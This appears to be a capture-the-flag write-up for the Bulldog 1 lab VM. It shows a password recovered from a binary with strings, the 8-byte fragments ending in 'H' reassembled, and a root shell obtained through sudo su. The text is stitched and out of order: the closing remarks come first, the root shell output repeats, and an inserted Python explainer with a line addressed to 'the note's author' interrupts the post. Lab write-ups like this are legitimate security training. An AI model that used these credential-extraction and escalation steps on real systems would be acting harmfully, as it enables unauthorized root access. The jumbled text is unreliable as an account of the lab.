Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe07:ae20/64 scope link
valid_lft forever preferred_lft forever
# uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
# whoami
whoami
root

Splitting and reassembling the hidden password

Actually my eye for English just wasn't sharp enough; I didn't notice that meaningful words had been split up and recombined here.

SUPERultH
imatePASH
SWORDyouH
CANTget

Drop the H and join the rest: SUPERultimatePASSWORDyouCANTget, i.e. "super ultimate password you can't get".
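Why strings shows the password in 8-byte pieces ending in H, as an added example (not part of the original post) covering both the strings output above and the reassembly just described: on x86-64 the compiler loads a local string literal into a register eight bytes at a time with movabs, and the 0x48 REX.W prefix of the store that follows each load is ASCII 'H'. The script below mimics strings on a constructed code sequence modelled on that layout (not bytes from the real customPermissionApp) and then recovers the full literal by decoding the movabs immediates directly.

```python
import re


def _printable(b: int) -> bool:
    return 32 <= b < 127


def strings_like(data: bytes, min_len: int = 4) -> list:
    """Mimic `strings`: maximal runs of printable ASCII at least min_len bytes long."""
    out, run = [], bytearray()
    for b in data + b"\x00":          # trailing NUL flushes the final run
        if _printable(b):
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


# movabs r64, imm64 is encoded as 48 B8+reg followed by the 8 immediate bytes.
MOVABS = re.compile(rb"\x48[\xb8-\xbf](.{8})", re.DOTALL)


def recover_movabs_strings(data: bytes, max_gap: int = 16) -> list:
    """Reassemble string literals that the compiler loaded 8 bytes at a time via movabs."""
    pieces = []                       # (start, end, text) per printable immediate
    for m in MOVABS.finditer(data):
        imm = m.group(1).rstrip(b"\x00")
        if imm and all(_printable(b) for b in imm):
            pieces.append((m.start(), m.end(), imm.decode("ascii")))
    results, current, last_end = [], "", None
    for start, end, text in pieces:
        # A new literal starts when the previous movabs is further back than one store or so.
        if last_end is not None and start - last_end > max_gap:
            results.append(current)
            current = ""
        current += text
        last_end = end
    if current:
        results.append(current)
    return results


def _chunk_store(chunk: bytes, disp: int) -> bytes:
    """48 B8 imm64 (movabs rax, imm64) then 48 89 45 disp8 (mov [rbp+disp8], rax)."""
    assert len(chunk) == 8
    return b"\x48\xb8" + chunk + b"\x48\x89\x45" + bytes([disp])


# Constructed code bytes (not from the page's binary) modelled on how GCC initialises
# `char pw[] = "SUPERultimatePASSWORDyouCANTget";` on the stack: the literal is loaded 8 bytes
# at a time, and the 0x48 REX.W prefix of each following store is ASCII 'H', hence "SUPERultH".
SAMPLE_TEXT = (
    b"\x55\x48\x89\xe5"               # push rbp; mov rbp, rsp
    + _chunk_store(b"SUPERult", 0xD0)
    + _chunk_store(b"imatePAS", 0xD8)
    + _chunk_store(b"SWORDyou", 0xE0)
    + _chunk_store(b"CANTget\x00", 0xE8)
    + b"\xc9\xc3"                     # leave; ret
)

if __name__ == "__main__":
    print(strings_like(SAMPLE_TEXT))            # ['SUPERultH', 'imatePASH', 'SWORDyouH', 'CANTget']
    print(recover_movabs_strings(SAMPLE_TEXT))  # ['SUPERultimatePASSWORDyouCANTget']
```

The takeaway for the note's author is that "a hacker wouldn't even be able to reverse it" does not hold for a secret baked into an ELF: any credential a binary needs must live outside it, with access controlled by the OS.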

django@bulldog:/home/django/bulldog$ su -
su -
Password: SUPERultimatePASSWORDyouCANTget

su: Authentication failure
django@bulldog:/home/django/bulldog$ sudo su root
sudo su root
[sudo] password for django: SUPERultimatePASSWORDyouCANTget

root@bulldog:/home/django/bulldog# whoami
whoami
root
root@bulldog:/home/django/bulldog# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe07:ae20/64 scope link
valid_lft forever preferred_lft forever
root@bulldog:/home/django/bulldog# uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Bulldog_1 VM
https://i3eg1nner.github.io/2023/07/57098f1aa06f.html
Author
I3eg1nner
Published on
July 3, 2023